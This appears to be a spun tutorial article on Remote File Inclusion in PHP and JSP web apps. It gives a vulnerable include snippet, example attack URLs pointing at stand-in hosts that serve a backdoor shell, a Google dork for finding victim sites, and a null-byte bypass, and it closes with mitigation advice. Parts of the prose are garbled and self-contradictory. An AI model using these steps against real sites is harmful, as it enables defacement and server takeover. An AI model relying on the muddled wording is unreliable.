Remote File

What is Remote File Inclusion?

Remote File Inclusion (RFI) This attack targets vulnerabilities in web applications that dynamically refer to external scripts. To upload malware to a remote URL, the attacker will exploit an application’s referencing function. RFI attacks that succeed lead to compromised servers and information theft. They also allow for site takeovers that permit modification of content.

Remote Inclusion Vulnerability Exemples: RFI Examples

These are some RFI examples that demonstrate vulnerability

A JSP page containing this line of code: can be manipulated with the following request: Page1.jsp?ParamName=/WEB-INF/DB/password. Processing the request discloses the content of the password file to the perpetrator.
An import statement is a request for content from a URL address in a web application. This statement, if unsanitized can be used to inject malware. For example: Page2.jsp?conf=https://evilsite.com/attack.js
RFI attacks are usually launched by manipulating request parameters to point to remote malicious files. Consider the following code as an example:

Remote File Inclusion PHP

$incfile = $_REQUEST[‘file”); include($incfile. “.php “);

The first line extracts the HTTP file parameter value, and the second line uses that value to dynamically assign the filename. This code can be used to allow file uploads without authorization if the file parameter value cannot be properly cleaned.

For example, this URL string http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor_ comprises an external reference to a backdoor file stored in a remote location (http://www.hacker.com/backdoor_shell.php. ()

This backdoor is used to access the application database or hijack the server’s basic server after it has been uploaded to the app.

What is RFI?

You will need to include a Remote File Include by adding a string containing the URL of the file and an Include function for the appropriate language. The website being attacked then requests the remote file and fetches its contents. The parser of that language then processes it.

A developer might want to include a local file-based upon the GET parameter page. There are three files: main.php and contact.php. Each file provides different functionality to the website. The following query can be used to call each file:

https://example.com/index.php?page=contact.php

Although the developer assumes that files within that folder will be included, an attacker could include files from other directories (LFI) or a remote file inclusion (RFI) server. An attacker can change the file path to the Include function of the programming language without a whitelist. Although the attacker can include a local file in an attack, they will also be able to change the file path to one that is on their server. This allows malicious code to be written in a file without needing to inject code into the webserver or poison logs.

The execution rights of the webserver user may affect the impact of an exploited remote-file inclusion RFI vulnerability. The webserver can execute any included source code, along with privileges granted to the current web server user. This allows for the execution of arbitrary codes. If the webserver user is granted administrative privileges, a full system compromise can also be achieved.

RFI allows you to deface a website

RFI is a vulnerability that allows an attacker to upload malicious code to a website or server. All website hacking attacks are not exactly about SQL injection. RFI can be used to hack websites and gain access to the server. You will need to first find an RFI-vulnerable website before you can hack it. It’s a well-known fact that hacking a server or website requires first finding an RFI vulnerability. Start by:

Go to Google and search for the following query. inurl: “index.php?page=home”
You can also visit other pages such as galleries or products from the same place.
Google is not required to find RFI-vulnerable websites if you already know about them.

RFI PHP

Three things could happen if it’s a truly vulnerable website.

The URL containing “page=home”, without an extension, will be obvious. If you include an extension in the URL, the site may actually give an error like ‘failure to include maliciousScript.txt’. This could happen because the site might be adding the.txt extension automatically to pages stored on a server.
To avoid errors, if it adds something to the lines of PHP, we must use the null byte “%00”.
Execution success

Remote File Inclusion (RFI), Prevention and Mitigation

Remote inclusion is a security feature that can be used to exploit RFI vulnerabilities. You should disable it in your programming languages’ configuration. You can set allow_url_include in RFI PHP to ‘0’. Before passing user input to an Include function, you should verify it. This can be done best with a whitelist.

By using proper input validation and sanitization, you can reduce the risk of RFI attacks. It is important to remember that not all inputs can be sanitized. Sanitization should not be used as a replacement for a real security solution. It is always better to sanitize user-supplied/controlled inputs to the best of your capability. These inputs are:

URL parameters
Cookie values
Parameters GET/POST
HTTP header values

Input fields must be checked against a whitelist during the sanitization process. Blacklist validation is considered weak because attackers have the option to provide input in a different format such as hexadecimal, or encoded formats. It is also a good idea to use output validation mechanisms at the server end. Proxy tools can also attack client-side validation functions. They have the advantage of reducing processing overhead.

Last tip: Always consider restricting permissions for upload directories. Also, make sure you have a whitelist of allowed file types and limit uploaded file sizes.